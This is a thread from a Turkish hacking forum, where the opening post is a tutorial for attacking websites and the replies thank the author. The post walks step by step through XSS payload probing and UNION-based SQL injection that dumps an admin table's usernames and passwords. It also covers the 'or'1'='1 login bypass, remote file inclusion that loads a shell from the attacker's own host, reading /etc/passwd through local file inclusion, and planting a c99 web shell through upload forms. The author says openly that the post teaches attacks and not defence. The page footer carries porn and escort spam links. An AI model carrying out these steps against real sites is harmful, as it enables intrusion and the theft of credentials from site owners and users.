KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Sql,Php,Xss Açıkları
Konu : Sql,Php,Xss Açıkları - 03.06.2016, 23:55
Mesaj: #1
İlk olarak Xss'de başlıyalım,
Bu Açık 2000 yılından beri var ve birçok webmaster'lar tarafından göz arda ediliyor. Bu açık sayesinde bir web sitesinin kullanıcıların bilgilerini rahatlıkla öğrenebilirsin bu kullanıcı admin'de olabilir, Xss açığı sayesinde site'de admin bilgilerini çalarak admin olabilirsiniz veya örnek olarak admin adına yorum yapabilirsiniz, konu paylaşabilirsiniz vs.

Bu açık genellikle url üzerinden ve arama motorları,yorum yapma bölümlerin'De oluşur.
İlk önce url'den bu açığı örnek bir siteye girelim.

www.örneksite.com 

Böyle bir örnek siteye girdik şimdi id linki olan bir link bulalım ben kategoriler'den bir tanesine tıklıyorum sonra herangi bir resim'e tıklıyorum şöyle bir 
Link geliyor...
www.örneksite.com/index.php?page=3
şimdi biz burada " = " kusmından sonraki yerleri siliyoruz ve javascript,html dilindeki komutları yazıyoruz eğer çalıştırırsa açık var demektir çalıştırmassada açık yok demektir ısrarcı olmayın ... birde şu var bazen javascript veya html kodunu çalıştırmaz eğer örnek olarak javascript kodunu denediyseniz çalışmadıysa pes etmeyin html komutunuda deneyin.

şimdi " = " kısmından sonraki yazıları sildik oraya java script kodunu yerleştireceğiz..

http://www.örneksite.com/index.php?page=**********alert("El zara ******** team") </script>

bu komutu yazıp entera bastıktan sonra eğer ekrana uyarı kutusunun içinde "El zara ******** team" yazdırdıysa sitede açık var demektir...

Bu yöntemin aynısını arama kutucuğunda'da yazabilirsiniz veya yorum yapma bölümünde'de...

Ama söyle birşey var siz bunları yaptığınızda sayfayı yenilediğinizde bu yaptıklarınız her şey yok olur eğer saldırıda gerçekseniz o zaman bir kaç yöntem daha öğrenmeniz gerekicektir.

Mesela saldırıyı ağırlaştıralım şimdi site'de yorum yapma bölümü arıyoruz o yorum yapma bölümü javascript kodunu çalıştırıyorsa oraya **** komutu yerleştiririz ****'yı bilmeyen arkadaşlara söylüyorum **** yönlendirmek için kullanır... bunu google'dan araştırarak rahatlıkla bulabilirsiniz.
mesela yönlendirme komutunda kendi index'inize yönlendire bilirsiniz veya virüs yaparak kendi virüs adresine yolluyabilirsiniz ...

Arkadaşlar en ağır Xss yöntemi ise xss sniffer'dır ben konunun başında size söylemiştim ben uzun bir zaman'dır hacking'e ara vermiştim bu xss konusunu daha öğrenmedim öğrendimde çok iyi bilmiyorum onun için size anlatamam ... zaten ileri zamanlar'da eğitim videoları çekiceğim o zaman konuyu rahatlıkla anlatabilirim. Xss çok iyi bir hacking yöntemidir basit gibi görünsede mynet,'yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime' gibi büyük siteler'dede bu açık görünmüştür eskiden bu açık 'yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime''yasaklı kelime''dede vardı ama 2009 senesinde kapatıldı diye biliyorum.


Gelelim SQL açıklarına.
Bu açığı çok severim hacking'e ilk başladığım yıllar belediye sitelerini vs hackliyordum ama o zaman çocuktum yani bilinçsiz bir şekilde yapıyordum bu açık çok geniş'dir mesela mysql hacking yapabilirsiniz,bypass yapabilirsiniz ama bilmediğiniz bir çok açığı daha çıkar yani bu paylaşımımı biliyorsanız bile çok çok sql üzerinde durman lazım sql 1 kaç günde veya 1 kaç sayfadan öğrenilecek konu değildir...

Arkadaşlar şimdi ben dork yazma,id değeri nedir bunun gibi konuları şimdi anlatmıyacam siz bunları önceden araştırsanız sevinirim çünkü öğretme becerim çok düşük'dür, bu kadar uzun yazaman sql ve diğer bir kaç açık'dan bahsettik'ten sonra hemen konuyu kapatıcam...

ilk olarak hedef sitemiz şu olsun ...
www.örnek.com.tr
Şimdi id linkini bulalım herangi bir kategoriye tıklıyoruz ben örnek olarak kayıt ola tıklıyorum ve söyle bir link geliyor bize...

www.örnek.com.tr/kayıt.php?id=1

Şimdi site'de hata varmı yokmu onu anlıyalım (') siteye tek tırnak koyduğumuzda hata veriyorsa veya site'de herangi birşey(yazı,resim) eksiliyorsa
O site'de sql açığı var demektir...

şimdi deniyelim...

www.örnek.com.tr/kayıt.php?id=1'

entera bastık'tan sonra söyle bir hata veriyorsa ;

Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 4 in /home/adapaza1/public_html/HTML/News/index.php on line 55

Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 4 in /home/adapaza1/public_html/HTML/News/index.php on line 58

"
Veya buna benzer hatalar veriyorsa o zaman site'de sql açığı var demektir...
Veya hiç hata vermiyebilir yazılar eksiliyorsa veya resimler eksiliyor'sa o zamanda açık var demektir...
Eğer site başka bir linke yönlendiriliyorsa Bu açığı aramayın demektir 

Şimdi kolonları bulalım ...

Bunun için bize lazım olan komut. "+order+by+1--"
Burada kolon sayım 1 diyor eğer site'de 1 kolon varsa hata vermez yoksa hata verir.
sonra 2,3,4,5,6 rakamlarını deniyoruz hata vermedi 7'de denedik hata verdiyse o zaman bütün kolonlarımız 6 kadarmış...
Bazı arkadaşlar söyle yanlış yapıyor hata verenin bir önceki sayısı kolon numarasıdır bu çok yanlış birşey...
Kolon sayısı hata verene kadar bütün numaralar'dır mesela 
+order+by+1-- hata vermedi
+order+by+2-- hata vermedi
+order+by+3-- hata vermedi
+order+by+4-- hata verdi
Böyle bir komutta 3 kolon numarası dersiniz ama bu yanlış kolon numarası 1,2,3'dür...

şimdi bunu site üzerinde deniyelim...

www.örnek.com.tr/kayıt.php?id=1+order+by+1-- hata vermedi
www.örnek.com.tr/kayıt.php?id=1+order+by+2-- hata vermedi
www.örnek.com.tr/kayıt.php?id=1+order+by+3-- hata vermedi
www.örnek.com.tr/kayıt.php?id=1+order+by+4-- hata vermedi
www.örnek.com.tr/kayıt.php?id=1+order+by+5-- hata vermedi
www.örnek.com.tr/kayıt.php?id=1+order+by+6-- hata verdi...
demekki kolon sayımız 5'e kadar hepsimiş....

şimdi bu kolonların hepsini çekelim...
gereken komutumuz "+union+select+1" ben buraya 1 yazdım arkadaşlar ama siz 1 yazmıyacaksınız oraya bütün kolonları yazıcaksınızki bütün kolonları çekesiniz.. bizim bütün kolon sayımız 5'idi şimdi komutumuzu deniyelim... "+union+select+1,2,3,4,5" olur... şimdi site üzerinde 
deniyelim..
http://www.örnek.com.tr/kayıt.php?id...ct+1,2,3,4,5--
Bunu yaptık'dan sonra entera basıyoruz ve ekrana numara gelicek ekrana dikkatli bakın eğer hiç bir şey eskimediyse sayfa eski halindeyse o zaman
id numarasının başına bir (-) tire işareti koyucağız..

http://www.örnek.com.tr/kayıt.php?id...ct+1,2,3,4,5--
Bunu yaptık'dan sonra entera basıyoruz ve ekranda sayıları buluyoruz not: sayıları çok değişik yerlere atabilir sayfaya dikkatli bakın sonra'dan eklenen sayılar bize lazım olucak diyelim ekranda resmin üzerine 2 ve 3 yansıdı şimdi biz bu sayılar ile admin tablosuna ulaşıcağız...

2 numarasını verdi bize şimdi version'ununu öğreniyoruz

http://www.örnek.com.tr/kayıt.php?id...ersion,3,4,5--

version bu: 5.40.cl 
Versionunu öğrendik version türlerini öğrenin size tavsiyem şimdi burada onu anlatmıyacağım konuyu kısa tutmaya çalışıyorum ....

şimdi yeni başlıyanlar için söylüyorum yazıcağım komutlara iyi odaklanın eğer çok zorlanıyorsanız size tavsiyem sql veri tabanı programlamayı öğrenin çok kolay... 
http://www.örnek.com.tr/kayıt.php?id...chema.tables--

ekrana tablo isimleri çıktı not = Büyük yazıyla yazılmış tabloları es geçin ... bizi küçük yazıyla yazılmış tablolar ilgilendirir. 
Şimdi burada bir sürü tablo ismi var biz bunlar uğraşmıyalım direk database tablolarını yansıtalım...

http://www.örnek.com.tr/kayıt.php?id...a=database()--
bunu yazdık'tan sonra karşımıza söyle tablo isimleri çıktı

personel,makale,resim,günlük,admin

şimdi biz buradan istediğimiz tabloyu çekebiliriz ... ben admin tablosunu çekiceğim ...

http://www.örnek.com.tr/kayıt.php?id...e_name=admin--

biz bu komutu yazdık ve entera bastık hata verdi birşey göstermiyor buradaki sorun +where+table_name=admin-- dedik burada
admin yazıyla yazılmıyor bunu hex'lememiz lazım siz herangi bir site'den hexleyin google'dan araştırıp hex yapan editörler bulabilirsiniz...

diyelim admin yazısını hexledik bize şöyle birşey verdi " 61 64 6d 69 6e " şimdi biz bu numaraları birleştirip başına 0x koyucağız...
örnek olarak: 0x61646d696e
Bunu admin yerine yazıyoruz. 
http://www.örnek.com.tr/kayıt.php?id...0x61646d696e--
şimdi entera bastık ve ekrana bize bunları çıkardı

id,username,password,name,surname

şimdi biz buradan username ve password'ü çekelim.

http://www.örnek.com.tr/kayıt.php?id...5+from+admin--

evet ekrana admin,admin koydular burada birincisi olan usenrame çünkü ilk username yazdık ikincisi olan password ...

Arkadaşlar bu konum bu kadar birde söyle birşey yaptım ben bazı komutların alt'larına açıklamasını yazmadım neden o komutu oraya koydum açıklamadım çünkü bu sizi geriletir yani yanlış anlamyın geriletir derken konuyu öğrenirsiniz ama başka bir konuda zorlanırsınız mesela
üst'deki komutları anlıyabilmek için o komutlar'daki kelimeleri tek tek ingilizceye çevirin ne yapmak istediğimi zaten anlarsınız mesela bu komut
+where+table_name=admin--- burada nerede tablo ismi admin dedik bunu ingilizce bilmeyenler için söylüyorum bu komutları translate'den çevirdiğinde sizde anlamış olucaksınız şimdi bunların inggilizcesini öğrenirseniz ileride size çok faydası olucaktır...


şimdi Sql'de veri girişi yapılan yerler'de admin girişi veya üye girişi olan bölümler'de nasıl sifresiz giriş yapıcağım onu göstericeğim...

İlk olarak örnek bir site'nin admin paneline giriyoruz ben hedef bir site seçtim...

www.hedefsite.com/admin
şimdi bu site'nin admin giriş sisteminde kullanıcı adı ve şifreyi 'or'1'='1 olarak giriyoruz örnek

username = 'or'1'='1
password = 'or'1'='1

entera bastığımızda bize birinci kullanıcı olarak giriş yapıcak ...
bu komut sadece bu kadar değil buna benzer komutlar'Da var örnek
x'or'1'='1
gibi komutlar var ama hepsi aynı bir birinden farkı yok ...

Bu açıkları kapatmanın tek yolu var oda bazı karekterleri filtrelemek olucak xss açığı içinde bu geçerlidir...

x, ' , * , + gibi karekterleri veri girişinde filtrelenmesi lazım'dır bu açığıda webmaster'lar gös arda ediyor şuan bir sürü site bunun sayesinde hackleniyor ama söyle birşey var wordpress, joomla hazır sistemlerin admin panelinde ve üye giriş yerine bu açık olmaz çünkü onlar bu açığın önlemeini almışlar admin paneline bakın derken sıradan script'lerin admin paneline bakın wordpress gibi sistemlerin admin paneline değil...


Şimdi arkadaşlar biz xss öğrendik,sql öğrendik şimdide size genel bilindik halen varolan açıklar'dan bahsediceğim ...

Rfi açığı;

Bu açık sayesinde siteye dosya yüklüyebiliriz mesela siteye uzaktan shell yükleyip site'nin veri tabanına ulaşığ veri tabanındaki diğer birçok siteyi hackliyebiliriz veya zarar verebiliriz.. şimdi size bu açığı göstericeğim anlatmıyacağım nasıl oluştuğu hakkında bilgi vermiyeceğim ben genellikle saldırı konularını anlatıyorum korunma gibi konularını google'dan araştırıp bulabilirsiniz...

hedef sitemiz şu örnek:
http://www.israel.co.it/index.php?page=1asd3
şimdi biz burada = kısmından sonraki yerleri boşaltım yerine herangi bir site yazıyoruz örnek ben google yazıyorum
http://www.israel.co.it/index.php?pa...www.google.com
eğer site'De google bilgileri çıktıysa veya arama motoru siteye geldiyse o site'de açık var demektir şimdi biz buraya shell'de yüklüyebiliriz...

http://www.israel.co.it/index.php?pa...adresim.gen.gg
dedik entera bastık ve karşımıza shell geldi şimdi shell'den index basabilirsiniz veya diğer sitelere ulabilirsiniz...

Lfi açığı ;
Bu yöntem'de Rfi yönteminin kardeşidir aynı ona benzer fakat rfi uzak'dan dosya dahil etme, lfi ise yerel'den dosya dahil etmedir...

Şimdi bu yöntem'de rfi'deki gibi bir link bulalım... 
http://www.israel.co.it/index.php?pa.../../etc/passwd
gördüğünüz gibi 

şimdide basit bir kaç tür daha açık'dan bahsediceğim bu açığın kodlamayla ilgisi yoktur koyulduğu yerle ilgisi vardır mesela 
bir site'de upload eden birşey varsa oraya shell yüklüyebilirsiniz ... örnek olarak
böyle bir dork yazalım

/upload veya /upload.php karşımıza çıkan sitelere shell yüklüyebiliriz veya dikaktli olunması gerekler resim upload eden siteler'dir burada 
yüklenen dosyalara dikkat edilmelidir resim uzaantısı jpg gibi olması lazım yoksa saldırgan burayada shell atabilir birde bir yöntem daha vardır saldırganlar shell'in uzantısını jpg yapıp tamper daha vs. programlar ile tekrar shell sokabilir örnek olarak
c99.php dosyasını c99.php.jpg yapıp siteye attıktan sonra orayı c99.php haline geri döndürebilirler...

WWW Alıntı ile Cevapla
Konu : Sql,Php,Xss Açıkları - 13.06.2016, 22:27
Mesaj: #2
harika anlatim olmuş eline emeğine yüreğine sağlık kardeşim
Multihack, üyesi illegalizm | Private illegal Topluluk - Hack forum,Warez Scriptler forumlarına 27.12.2015 tarihinde katılmıştır.

WWW Alıntı ile Cevapla
Konu : Sql,Php,Xss Açıkları - 14.06.2016, 02:20
Mesaj: #3
Teşekkür ederim.

WWW Alıntı ile Cevapla
Konu : Sql,Php,Xss Açıkları - 14.06.2016, 10:52
Mesaj: #4
Eline Sağlık

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno